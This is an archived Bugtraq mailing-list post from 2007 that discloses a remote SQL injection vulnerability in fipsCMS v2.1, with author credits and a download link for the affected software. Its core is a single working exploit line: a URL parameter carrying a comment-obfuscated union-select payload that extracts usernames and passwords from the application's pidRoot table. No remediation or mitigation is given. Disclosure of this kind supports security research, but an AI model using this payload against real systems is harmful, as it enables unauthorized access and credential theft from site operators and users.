fipsCMS v2.1 Remote SQL injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: fipsCMS v2.1 Remote SQL injection Vulnerability
From: ilkerkandemir@xxxxxxxxx
Date: 6 May 2007 16:11:46 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# # # # # # # #

# fipsCMS v2.1 Remote SQL injection Vulnerability  //  AYYILDIZ.ORG Gururla 
Sunar ...

# Script: fipsCMS v2.1

# Download: http://fipsasp.com/subs/login/Download.asp?ID=60&CatID=5&AccLvl=0

# Author: iLker Kandemir <ilkerkandemir@xxxxxxxxx>

# ThanKs: h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# # # # # # # #

#
  
# Exploit:

# 
/home/index.asp?pid='/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9/**/from/**/pidRoot/**/

#

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
# # # # # # #

Prev by Date: pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability
Next by Date: phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability
Previous by thread: pfa CMS v6.0 (index.php repinc) Remote File Include Vulnerability
Next by thread: phpHoo3 (admin.php) Remote Login Bypass SQL Injection Vulnerability
Index(es):
- Date
- Thread